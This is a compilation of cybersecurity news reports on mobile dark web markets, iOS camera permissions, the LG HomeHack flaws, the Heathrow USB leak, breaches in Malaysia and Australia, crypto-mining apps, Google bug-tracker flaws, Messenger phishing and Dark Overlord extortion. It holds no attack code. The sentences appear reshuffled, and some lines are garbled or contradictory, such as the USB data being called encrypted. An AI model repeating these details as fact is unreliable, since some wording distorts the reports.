CYBERCRIMINALS LAUNCH ‘BLACK MARKET FOR ANDROID USERS’ AS DARK WEB GOES MOBILE
In the wake of police action and drug market closures this year, dark web users are now turning toward secretive mobile services and traditional messaging apps, research suggests. Yet mobile devices are not only being used for chatting, as the research claimed that some enterprising cybercriminals are taking full advantage of Orbot – the Android browser maintained by anonymity service Tor – to launch new black markets. Our findings suggest Discord is becoming the go-to-app for mobile dark web discussions,” the team said, referencing the chat service typically used by gamers. Matanga] offers its mobile-first clients easy access to the services of the dark web from their mobile device and we expect to see more dark web vendors creating similar apps in the future. The dark web, which is protected by anonymity technology, including Tor, is increasinly accused of aiding criminality and terrorism. Some criminals lurking on the underground internet are even building dedicated marketplaces for Android users, typically masked by the anonymity provided by Tor’s “Orbot” application. The anonymity promised by dark web networks such as TOR and i2p was the key reason for their popularity among cybercriminals,” said Guy Nizan, IntSights co-founder and CEO. Now that the dark web is no longer safe for hackers they are moving to messaging platforms and conducting their illicit activities on the same apps that millions use every day. While the use of messaging apps for illicit activity has been on the rise for some time, the closure of Alphabay, Hansa and suspected compromise of Dream Market. The Intsights team found mobile dark web activity was spiking, with many people using mainstream services like Discord, Telegram and WhatsApp to trade illicit goods – including credit cards, breached records, hacking tools and illegal drugs.
IS YOUR IPHONE SPYING ON YOU? IOS APPS CAN SECRETLY TURN ON YOUR CAMERA AND TAKE VIDEO
Once you take and post one picture or video via a social network app, you grant full access to the camera, and any time the app is running, the app can use the camera. Additionally, granting camera access to some modern apps can – thanks to new Apple’s Vision technology in the most recent software – now be used to gauge the “emotions” of users and “detect if the user is on their phone alone or watching together with a second person. The researcher said that users can remain protected by using camera covers, but advised that Apple should design a method of granting apps only temporary access to the camera. Krause, who recently discovered a convincing phishing scam targeting Apple devices, said that some iOS apps can “live stream their camera onto the internet” and use the front and back camera to judge the user’s location. These apps, like a messaging app or any newsfeed-based app, can easily track the user’s face, take pictures, or live stream the front and back camera, without the user’s consent. Apple] iOS users often grant camera access to an app soon after they download it. In his analysis, published this week (25 October), Krause said that giving apps access to the camera will let them take images without your consent, secretly record you and even run cutting edge face tracking features. When you download an iOS application, especially those in the social media category, one of the most common permissions you will grant it is access to the iPhone’s camera. In a video uploaded to YouTube, Krause demonstrated just how easy it would be to snoop on users via the camera by creating a fake social media-style iOS application. It is easy to hit the ‘Allow’ button and forget about it, but Google researcher Felix Krause has warned that doing so can let iOS applications run wild – and may jeopardise your privacy.
HACKERS COULD HIJACK LG’S SMART HOME PRODUCTS TO SPY ON YOU IN REAL TIME
As more and more smart devices are being used in the home, hackers will shift their focus from targeting individual devices, to hacking the apps that control networks of devices,” said Oded Vanunu, head of products and vulnerability research at Check Point. Koonseok Lee, manager of LG’s smart development team, said: “LG Electronics plans to continue strengthening its software security systems as well as work with cybersecurity solution providers like Check Point to provide safer and more convenient appliances. Users need to be aware of the security and privacy risks when using their IoT devices and it is essential that IoT manufacturers focus on protecting smart devices against attacks by implementing robust security during the design of software. Experts from cyber firm Check Point, who dubbed the flaws “HomeHack”, were able to exploit the bugs to take control of LG user accounts which, by extension, gave them access to the connected devices. Check Point advised users to ensure they have the latest mobile security updates installed – which can be done via the Google Play and Apple stores. The LG smart home appliances will also need to be updated with the latest software version via the SmartThinQ application dashboard. This camera, in the case of account takeover, would allow the attacker to spy on the victim’s home, with no way of them knowing, with all the obvious negative consequences of invasion of privacy and personal security violation,” Check Point said in a blog post. In 2016, LG said that 80m smart home devices had been shipped worldwide. The HomeHack vulnerabilies were disclosed to LG on 31 July 2017, with the electronics firm successfully patching the SmartThinQ app at the end of September. Critical bugs were found in the mobile application and cloud platform linked to LG’s SmartThinQ range.
USB STICK FOUND IN STREET CONTAINS HEATHROW AIRPORT SECURITY INFORMATION
5GB of data on the flash drive was encrypted or password protected, allowing the man to explore 76 folders holding sensitive security information for London’s Heathrow airport. ” While slotting a USB stick into a computer is certainly a risky thing to do, in this case it appears to have exposed a monumental lapse in security that’s certain to force the airport into conducting a full review of the way it handles sensitive data. But instead of ruining one of the library’s computers, the USB stick revealed highly confidential information linked to the security procedures of one of the world’s busiest airports, according to the Sunday Mirror. The stick also contained details of all the different kinds of identification required to enter the airport’s restricted areas — including for undercover cops — and “maps pinpointing CCTV cameras and a network of tunnels and escape shafts linked to the Heathrow Express,” a train route that runs between the airport and central London. Unnamed sources connected with the airport told the news outlet that those looking into the matter were keen to discover if the incident was the result of an “incompetent data breach” or if someone had intentionally transferred the information onto the drive and taken it off site, possibly for nefarious purposes such as terror or cyberattacks. Heathrow said in a statement that passenger and staff safety was its “top priority,” adding that it was confident the airport was “secure. Containing “maps, videos, and documents,” the data revealed, for example, the route the Queen and her entourage take when heading to and from the airport, and the security measures put in place to ensure her safety. The idea that someone working at the airport may have secretly transferred the data onto a stick and then taken it away from the site
MASSIVE DATA BREACH HITS MALAYSIA AS OVER 46 MILLION PEOPLE’S DATA ENDS UP ON DARK WEB
The dark web also reportedly contained databases of over 80,000 compromised records from the Malaysian Medical Council (MMC), the Malaysian Medical Association (MMA) and the Malaysian Dental Association (MDA. Malaysia has been hit with a massive data breach, as the records of over 46 million mobile phone number subscribers ended up for sale on the dark web. An unknown hacker is reported to have put up millions of sensitive records stolen from Malaysian telecoms and network operators for sale on the dark web. According to local reports, the data of mobile number subscribers appears to have come from major local operators including, DiGi, Celcom, Maxis, Tunetalk, Redtone and Altel. net, the first to report about the data breach, the records came from a massive data breach thought to have occurred in 2014. It is still unclear how such a massive trove of data from what appears to be multiple sources came to be compromised and then put up for sale on the dark web. The data leaked includes users’ names, prepaid and postpaid phone number, addresses, customer details and SIM card data. This indicates the the leaked data may belong to people with multiple mobile numbers. IBTimes UK has not independently verified the validity of the data allegedly up for sale on the dark web. netfounder Vijandren Ramadass told The Star that it had handed over all the sample of the stolen data it had received from the hacker to the Malaysian Communications and Multimedia Commission.
GOOGLE PLAY STORE PLAGUED BY HIDDEN CRYPTOCURRENCY MINING MALWARE ATTACKING ANDROID PHONES
Mobile software found on Google’s Play Store, the official application marketplace, contains malware that could infect Android devices and clandestinely mine cryptocurrency. These threats highlight how even mobile devices can be used for cryptocurrency mining activities, even if, in practice, the effort results in an insignificant amount of profit,” Trend Micro’s mobile threat response team wrote in its analysis. This enslaving is typically accomplished by surreptitiously inserting code into popular services which, when accessed by a user, executes and downloads a file on the user device. Yet it appears that cryptocurrency-focused malware is increasingly targeting smartphone users. As cryptocurrencies have grown in popularity and value, cryptocurrency mining has turned into a lucrative business,” said Chris Olson, CEO of web monitoring firm The Media Trust. Cryptocurrency mining typically works by hijacking a device’s computing power in order to “mine” digital currency, in this case Monero. While some details remain unknown, experts say it is unique for such malware to be targeting mobiles. Coinhive, a popular mining software, was recently found on The Pirate Bay. Most users only notice when the device experiences unexpected behaviour, i. Users should take note of any performance degradation on their devices after installing an app,” it added.
AUSTRALIA DATA LEAK: NEARLY 50,000 GOVERNMENT AND PRIVATE STAFFERS’ SENSITIVE DATA PUBLICLY EXPOSED
In yet another accidental data breach, sensitive and personal information of nearly 50,000 Australians was reportedly left freely exposed online. The breach reportedly affected 3,000 employees at the Department of Finance, 1,470 staffers at the Australian Electoral Commission, and 300 employees at the National Disability Insurance Agency. The data left exposed reportedly included names, IDs, passwords, phone numbers, addresses, credit card information, staff salary details and more. Around 17,000 staffers records from Utility UGL and 1,500 employees’ data from Sydney-headquartered Rabobank were also exposed. However, financial services firm AMP was reportedly the one worst affected by the breach, with over 25,000 staffers’ records freely exposed to the public as a result of the misconfigured S3 bucket. The data was allegedly left exposed due to a misconfigured Amazon S3 bucket, presumably left unsecured by a third-party contractor. The breach, which is reportedly now considered to be the largest since last year’s Red Cross breach, affected employees of the government and private firms. Wojciech reportedly claims that he alerted the Australian defence department and AMP about the breach in October, but only received a response from the government agency. AMP confirmed that a “limited amount of company data” detailing staff expenses had been unknowingly exposed by a third-party contractor. It still remains unclear as to how long the data was left publicly accessibly before Wojciech stumbled onto it.
‘HOLY GRAIL OF GOOGLE BUGS’ EXPOSED FIRM’S FULL VULNERABILITY DATABASE OF KNOWN AND UNPATCHED FLAWS
A security researcher uncovered a series of bugs in Google’s internal bug tracking platform, called Google Issue Tracker aka the Buganizer, which allowed him access to Google’s entire database of known and unknown vulnerabilities. Security researcher Alex Birsan found three flaws within Google Issue Tracker, which is normally only accessible to internal Googlers monitoring bugs in the firm’s products. Google rewarded the researcher with over $15,000 in bug bounties and was also given a grant of an additional $3,133 to continue his research on vulnerabilities with the Issue Tracker, ZDNet reported. Exploiting this bug gives you access to every vulnerability report anyone sends to Google until they catch on to the fact that you’re spying on them,” Birsan told Motherboard. According to Birsan, the flaws could have been considered the “Holy Grail of Google bugs” given the kind of access it provided. The largest of the flaws gave Birsan the ability to access to the platform, which in turn allowed him to view the firm’s entire list of dangerous vulnerabilities. Birsan said he created a fake Google corporate email account, which he then used to trick the Buganizer into thinking he was a legitimate Google employee. Google patched the flaws after Birsan reported them to the firm. This gave him higher privileges to view and bug reports and also receive updates and notifications on issues. I’m very happy with the extra cash, and looking forward to finding bugs in other Google products,” Birsan said.
WATCH OUT FOR THIS PASSWORD-STEALING FACEBOOK HACK THAT’S HITTING IOS AND ANDROID USERS
A phishing campaign has been spotted spreading via Facebook Messenger and targeting users across Europe including Germany, Sweden and Finland, security experts have warned. Frederic Vila, security researcher with Helsinki-based F-Secure, said Monday (30 October) that a redirection technique was being used by criminals to send users to a malicious phishing page. The ultimate aim was to steal the passwords of victims on both iOS and Android. Links were sent posing as YouTube videos, but hackers used URL shorteners including “po.st” and “utm.io” to hide the locations of where users would end up. Based on forensic analysis of the link data over a two-week period, the scheme was launched on 15 October and has reached 200,000 clicks in total. According to F-Secure, the operation expanded as more passwords were scooped up – with hackers also taking advantage of the hacked accounts for ad fraud. Vila wrote: “Cybercriminals used those stolen credentials to spread the malicious links, and subsequently gather more credentials. “While in the process of stealing the credentials, the cybercriminals also attempted to earn from other non-iOS and non-Android users through ad-fraud.” The expert said that such phishing schemes are made worse, in part, because Facebook lets those on the platform use a general email address as a username. Vila said: “Just by launching this Facebook phishing campaign, [hackers] harvest email and password credentials that are later on used for secondary attacks such as gaining access to other systems or services that could have a bigger monetary value. “We highly recommend the affected users to change their passwords as soon as possible, including other systems and services where the same compromised password was used.” It’s not the first time phishing scams have been caught spreading via the popular social network. In late August this year, security experts from Russia’s Kaspersky Lab found cybercriminals were using the Messenger service to circulate malicious links to “advanced” forms of adware.
DARK OVERLORD HACKERS REVEAL PLANS TO LEAK ‘HOLLYWOOD DATABASE STOLEN FROM TOP STUDIO’
Hacking group The Dark Overlord is threatening to leak the internal client data of top Hollywood production studio Line 204, IBTimes UK has learned. Based on one section of the database labelled ‘CustomerFile’, Line 204 clients have in the past included Apple, Netflix, Funny or Die, ABC, HBO, Hulu and many more. The seemingly international group of hackers, which recently targeted streaming giant Netflix and a London-based plastic surgeon’s office, provided evidence that it had accessed the firm’s customer database. On Tuesday (31 October), Line 204 confirmed the attack on its network and said it has contacted the FBI to help probe the loss of potentially-sensitive client data. As with all of our friends who don’t accept one of our handsome business proposals, we’ll handle them appropriately by publicly releasing all their client data, documents, intellectual property, and other sensitive documentation,” the group said via encrypted chat. Alton Butler, CEO of Line 204, confirmed in a statement sent via a PR staffer that an “international cyberattack organisation” had accessed its database on 26 October. The Dark Overlord hackers, whose identities remain a mystery, called out Line 204’s CEO Butler. He said: “This group has hit other studios in the past year and is trying to continue their destructive path with Line 204. The collective is known to hack targets then approach them to demand money – in exchange for not leaking the stolen information. We’ve only begun,” one member of the group said via encrypted chat.